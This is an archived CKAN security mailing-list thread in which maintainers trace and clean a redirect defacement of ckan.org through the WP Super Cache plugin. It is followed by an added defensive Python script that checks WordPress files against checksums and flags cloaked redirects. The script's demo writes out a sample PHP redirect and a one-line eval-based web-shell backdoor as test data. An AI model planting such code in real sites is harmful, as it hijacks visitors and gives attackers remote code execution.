[CKAN-Security] Fwd: ckan.org top page defaced?

Goce Mitevski goce.mitevski at keitaro.com
Mon Aug 5 07:26:01 UTC 2019


Hi Chiaki,

Thanks for the update.

Are things still looking good and clean on your side?

> A new vulnerability or vulnerabilities must have been found by the black hats in the meantime.

Maybe. I did some research and I can't find anything other than the
vulnerability reported in 2013. I will for sure report this.

Regards,
Goce Mitevski

On Sun, Aug 4, 2019 at 3:24 AM chiaki-ishikawa-thunderbird-account
<chiaki.ishikawa at ubin.jp> wrote:
>
> Dear Goce,
>
> Hi, this is Chiaki again.
>
> This is past 10:00 o'clock in Japan.
>
> The https://ckan.org looks good and clean (!)
>
> Google search for "ckan.org" from Yokohama, Japan (about 50 km south of
> Tokyo) does not show the redirected result any more.
>
> Great.
>
> As for 'wp-super-cache/wp-cache.php', I have no idea if a new
> vulnerability is known to the security community.
> There is a five-year-old web page I could find about its vulnerability
> in the past:
> https://www.inmotionhosting.com/support/news/archived/wordpress-w3-total-cache-and-wp-super-cache-vulnerability
>
> A new vulnerability or vulnerabilities must have been found by the black
> hats in the meantime.
> You may want to report the problem to
> - the authors of wp-super-cache,
> - CERT-like organizations of where you live,
> - US-CERT itself, etc. or
> - all of the above.
>
> Why would anyone want to deface ckan.org? I can't think of a reason, but
> maybe good connectivity (bandwidth), good popularity, and above all
> the fact that the site is using the vulnerable cache plugin(s) mean it may
> be attacked randomly.
> If my conjecture is correct, there may be more reports of similar
> defacing in the press soon.
>
> I hope you can take a rest now.
>
> Regards,
> Chiaki
>
>
> On 2019/08/04 2:19, Goce Mitevski wrote:
> > Hi everyone,
> >
> > I've been struggling to restore the blogfarm all day long and I think
> > I'm finally onto some important findings.
> >
> > I noticed that for the past few hours only one file was continuously
> > exploited - wp-super-cache/wp-cache.php. That is a file that belongs
> > to the WP Super Cache plugin and this plugin is obviously one possible
> > point of attack. I deactivated and removed it across the blogfarm.
> > That should close at least one hole and if that's the only one the
> > attacker uses, the problems might finally be resolved for good.
> >
> > In the meantime, I verified the checksums for all WordPress instances
> > and plugins across the blogfarm and all is clear.
> >
> > Do let me know if you don't see search results slowly recovering in
> > the next few hours.
> >
> > Regards,
> > Goce
> >
> > On Sat, Aug 3, 2019 at 6:04 PM chiaki-ishikawa-thunderbird-account
> > <chiaki.ishikawa at ubin.jp> wrote:
> >> Hi all,
> >>
> >> It is past midnight, 01:00 am in Japan.
> >>
> >> I am afraid the redirection of https://ckan.org comes back (!?).
> >>
> >> I believe whoever has the way to inject the malicious code in the first
> >> place still has the path through which the injection was done, or may
> >> have a new path or new paths.
> >> Hmm...
> >>
> >>
> >> Have you heard any news from other regions of the world?
> >> If I am not mistaken, the redirection code may have the intelligence to
> >> show me a webpage of a mail order house that is written in Japanese.
> >> I am afraid the injection code writer may be a skilled person who
> >> incorporated the intelligence to check the origin of access and show a
> >> proper website (i.e., pick up a language spoken in the accessing user's
> >> region/country).
> >> That a malicious code shows me a Japanese web page doesn't seem to be a
> >> simple coincidence.
> >>
> >> TIA
> >>
> >>
> >> Chiaki
> >>
> >>
> >> On 2019/08/03 21:46, David Read wrote:
> >>> Much appreciated, Goce,
> >>> David
> >>>
> >>> On Fri, 2 Aug 2019 at 20:13, Goce Mitevski <goce.mitevski at keitaro.com> wrote:
> >>>> I am working on it and the problems are still not resolved entirely.
> >>>>
> >>>> Regards,
> >>>> Goce
> >>>>
> >>>> On Fri, Aug 2, 2019 at 6:07 PM David Read
> >>>>
> >>>> <david.read at hackneyworkshop.com> wrote:
> >>>>> Great, thanks Goce.
> >>>>>
> >>>>> I looked yesterday 2 hours after Chiaki's initial report and also
> >>>>> didn't see anything wrong. So I guess Adria and co fixed this quickly.
> >>>>>
> >>>>> David
> >>>>>
> >>>>> On Fri, 2 Aug 2019 at 15:23, Goce Mitevski <goce.mitevski at keitaro.com> wrote:
> >>>>>> Hi David,
> >>>>>>
> >>>>>> The malicious code and the filesystem were cleaned in the meantime.
> >>>>>> That's why you can't notice anything different at the moment.
> >>>>>>
> >>>>>> Regards,
> >>>>>> Goce Mitevski
> >>>>>>
> >>>>>> On Fri, Aug 2, 2019 at 4:29 PM David Read
> >>>>>> <david.read at hackneyworkshop.com> wrote:
> >>>>>>> It looks fine to me. What am I missing?
> >>>>>>> David
> >>>>>>>
> >>>>>>> On Thu, 1 Aug 2019 at 23:19, 石川 千秋 <chiaki.ishikawa at ubin.jp> wrote:
> >>>>>>>> Dear Adrià,
> >>>>>>>>
> >>>>>>>> You are welcome.
> >>>>>>>>
> >>>>>>>> I am glad that you are aware of the problem.
> >>>>>>>> When one of my colleagues approached me late afternoon in Japan saying that
> >>>>>>>> something is wrong with ckan.org website and I myself accessed the URL,
> >>>>>>>> my jaw dropped.
> >>>>>>>>
> >>>>>>>> We help some government agencies' open data initiative in Japan.
> >>>>>>>> Already, the cabinet office's web page disabled the "Powered by ckan" link.
> >>>>>>>> They have the staff man-power to do that. I am afraid my colleagues need to
> >>>>>>>> talk with people at Tokyo Metropolitan government and other ckan site
> >>>>>>>> people regarding this issue.
> >>>>>>>>
> >>>>>>>> I am afraid that this event has put rather negative publicity on ckan. That is
> >>>>>>>> why I wanted to make sure that CKAN people are aware ASAP.
> >>>>>>>>
> >>>>>>>> I hope you can resolve the issue at the earliest time.
> >>>>>>>>
> >>>>>>>> At the same time, I know how you feel.
> >>>>>>>> I have done a sysadmin-like job in my previous office, and a self-appointed
> >>>>>>>> admin of a rather complex home LAN/WAN.
> >>>>>>>>
> >>>>>>>> Identifying the issue, cleansing the server if necessary, etc. Ouch...
> >>>>>>>> You have my sympathy.
> >>>>>>>>
> >>>>>>>> I hope the problem is not wide-spread.
> >>>>>>>>
> >>>>>>>> Good luck (!)
> >>>>>>>>
> >>>>>>>> Best regards,
> >>>>>>>> Chiaki
> >>>>>>>>
> >>>>>>>>
> >>>>>>>> On 2019/08/01 18:10, Adrià Mercader wrote:
> >>>>>>>>> Dear Chiaki,
> >>>>>>>>>
> >>>>>>>>> Thank you very much for your report. We are aware of the issue and working
> >>>>>>>>> on a fix.
> >>>>>>>>> Apologies for the inconvenience caused.
> >>>>>>>>>
> >>>>>>>>> Best regards,
> >>>>>>>>>
> >>>>>>>>> Adrià
> >>>>>>>>>
> >>>>>>>>> On Thu, 1 Aug 2019 at 11:08, 石川 千秋 <chiaki.ishikawa at ubin.jp> wrote:
> >>>>>>>>>
> >>>>>>>>>       Hi,
> >>>>>>>>>
> >>>>>>>>>       I finally found this security at ckan.org address.
> >>>>>>>>>
> >>>>>>>>>       It looks like there is a bug or possibility of web page defacing that
> >>>>>>>>>       causes
> >>>>>>>>>       access to https://ckan.org/ to be automatically redirected to
> >>>>>>>>>       commercial mail order website web pages.
> >>>>>>>>>
> >>>>>>>>>       In Japan, when I search for "ckan.org" using google,
> >>>>>>>>>       the top several hits
> >>>>>>>>>       are all about the mail order houses.
> >>>>>>>>>
> >>>>>>>>>       This was not the case at least a few days ago according to my colleagues.
> >>>>>>>>>
> >>>>>>>>>       TIA
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>       -------- Forwarded Message --------
> >>>>>>>>>       Subject:        ckan.org top page defaced?
> >>>>>>>>>       Date:   Thu, 1 Aug 2019 17:33:39 +0900
> >>>>>>>>>       From:   ishikawa <chiaki.ishikawa at ubin.jp>
> >>>>>>>>>       To:     webadmin at ckan.org,
> >>>>>>>>>       postmaster at ckan.org,
> >>>>>>>>>       abuse at support.gandi.net,
> >>>>>>>>>       web-admin at ckan.org
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>       Dear sirs/madams,
> >>>>>>>>>
> >>>>>>>>>       By now, you must be aware that the top page access to https://ckan.org/ is
> >>>>>>>>>       redirected to commercial sites (mail order houses).
> >>>>>>>>>
> >>>>>>>>>       When I search ckan.org using google, the
> >>>>>>>>>       first several entries point to these commercial sites.
> >>>>>>>>>
> >>>>>>>>>       (However, the subdomains of ckan.org seem to be free
> >>>>>>>>>       of such redirection.)
> >>>>>>>>>
> >>>>>>>>>       I work at an office where the open data initiative at regional government
> >>>>>>>>>       offices is supported, and
> >>>>>>>>>       some people noticed that clicking on "Powered by CKAN" results in
> >>>>>>>>>       commercial
> >>>>>>>>>       site web pages since this morning (Japan Standard Time).
> >>>>>>>>>       The redirection may have happened last evening, but I am not sure.
> >>>>>>>>>
> >>>>>>>>>       I tried to send a message using a submission page at ckan.org
> >>>>>>>>>       that could be
> >>>>>>>>>       accessed via, say,
> >>>>>>>>>       clicking the "Contact Us" web page of https://demo.ckan.org/ja/
> >>>>>>>>>
> >>>>>>>>>       As I mentioned, the subdomain seems to be free from this re-direction
> >>>>>>>>>       attack
> >>>>>>>>>       (?).
> >>>>>>>>>
> >>>>>>>>>       Anyway, it would be great if you can alert ckan people since ckan is used
> >>>>>>>>>       very widely all over the world by many government offices and people
> >>>>>>>>>       tend to
> >>>>>>>>>       see "Powered by CKAN"
> >>>>>>>>>       logo and may click it. If they see an unrelated commercial site web page
> >>>>>>>>>       then, the reputation of CKAN or confidence in CKAN may diminish a bit :-(
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>       Just thought to let you know about this unfortunate development.
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>       I hope you can clear up this issue very soon.
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>       Thank you in advance for your attention.
> >>>>>>>>>
> >>>>>>>>>       Regards,
> >>>>>>>>>
> >>>>>>>>>       Chiaki Ishikawa
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>       _______________________________________________
> >>>>>>>>>       CKAN security
> >>>>>>>>>       https://lists.okfn.org/mailman/listinfo/security
> >>>>>>>>>       https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
> >>>>>>>>>
> >>>>>>>>>       Repo: https://github.com/ckan/ckan-security
> >>>>>>>>>
> >>>>>>
> >
>


-- 

Goce Mitevski
Chief Design Officer,
Keitaro Inc.

goce.mitevski at keitaro.com
http://www.keitaro.com/

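Two points in the thread above lend themselves to a worked check: the checksum verification of the WordPress instances and plugins that Goce describes, and Chiaki's observation that the injected redirect seemed to choose its target by the visitor's language or region. The script below is an added example, not code from the CKAN security list or from the CKAN project. It assumes a manifest in the shape served by api.wordpress.org's core checksums endpoint (relative path to MD5 hex, the same data `wp core verify-checksums` consumes), builds a small constructed WordPress-like tree in a temporary directory so it runs offline, and then does two things: compares the tree with the manifest (modified, missing and unexpected files), and runs a crude triage over anything that differs, looking for the markers of a cloaked redirect (crawler or language checks feeding a Location header, or an eval() of an encoded blob). The plugin path, file contents and indicator list are constructed for the demo.

```python
"""Integrity check of a WordPress tree against a checksum manifest, plus
triage of the files that differ. Added example; the manifest shape follows
api.wordpress.org's checksums JSON ({"checksums": {"rel/path": "md5hex"}}),
everything else below is constructed for the demo."""
import hashlib
import os
import re
import tempfile

# Markers of a cloaked redirect: injected PHP that decides what to serve from
# who is asking (crawler user-agent, referrer, visitor language) and sends
# them elsewhere, often wrapped in eval() of an encoded blob. Constructed
# list for this example; legitimate plugins also read some of these.
REDIRECT_INDICATORS = [
    ("encoded-eval", re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I)),
    ("request-fingerprint", re.compile(rb"HTTP_(USER_AGENT|REFERER|ACCEPT_LANGUAGE)")),
    ("location-header", re.compile(rb"header\s*\(\s*['\"]Location:", re.I)),
    ("crawler-check", re.compile(rb"googlebot|bingbot", re.I)),
]


def md5_file(path):
    """MD5 of a file, streamed; the vendor manifest is MD5, so we match it."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_tree(root, manifest):
    """Compare every file under root with the manifest.

    Returns {"modified": [...], "missing": [...], "unexpected": [...]} of
    relative paths. "unexpected" (present on disk, absent from the manifest)
    is where dropped backdoors live; a plain checksum tool may not list it."""
    expected = manifest["checksums"]
    result = {"modified": [], "missing": [], "unexpected": []}
    seen = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            seen.add(rel)
            if rel not in expected:
                result["unexpected"].append(rel)
            elif md5_file(full) != expected[rel]:
                result["modified"].append(rel)
    result["missing"] = sorted(set(expected) - seen)
    for key in result:
        result[key].sort()
    return result


def triage(root, paths):
    """Map each path to the indicator names that match its contents."""
    hits = {}
    for rel in paths:
        with open(os.path.join(root, rel), "rb") as f:
            data = f.read()
        matched = [name for name, pat in REDIRECT_INDICATORS if pat.search(data)]
        if matched:
            hits[rel] = matched
    return hits


def demo():
    """Build a constructed install, tamper with it, run both checks."""
    clean = {
        "index.php": b"<?php require __DIR__ . '/wp-blog-header.php';\n",
        "wp-content/plugins/wp-super-cache/wp-cache.php": b"<?php // plugin code\n",
    }
    manifest = {"checksums": {p: hashlib.md5(c).hexdigest() for p, c in clean.items()}}
    root = tempfile.mkdtemp()
    for rel, content in clean.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(content)
    # Simulated defacement (constructed): a crawler/language-aware redirect
    # appended to the plugin file, and a dropped eval() backdoor.
    injected = (b"<?php if (stripos($_SERVER['HTTP_USER_AGENT'],'googlebot')!==false"
                b" || strpos($_SERVER['HTTP_ACCEPT_LANGUAGE'],'ja')===0)"
                b" { header('Location: http://example.invalid/'); exit; }\n")
    with open(os.path.join(root, "wp-content/plugins/wp-super-cache/wp-cache.php"), "ab") as f:
        f.write(injected)
    with open(os.path.join(root, "wp-content/uploads.php"), "wb") as f:
        f.write(b"<?php eval(base64_decode($_POST['x']));\n")
    report = verify_tree(root, manifest)
    report["triage"] = triage(root, report["modified"] + report["unexpected"])
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a live host, `wp core verify-checksums` and `wp plugin verify-checksums --all` do the manifest comparison against wordpress.org for core and for directory-hosted plugins; what a script like this adds is the `unexpected` list and the triage, since a dropped file is by definition in no manifest. The indicator list is deliberately crude: caching and analytics code reads `HTTP_USER_AGENT` too, so a hit is a reason to open the file, not a verdict. And a clean comparison is not proof the site is clean, as the thread itself shows when the redirect returned after the checksums matched: the foothold can sit outside the checked tree, in the database, a cron entry, the web server configuration, or a still-valid credential.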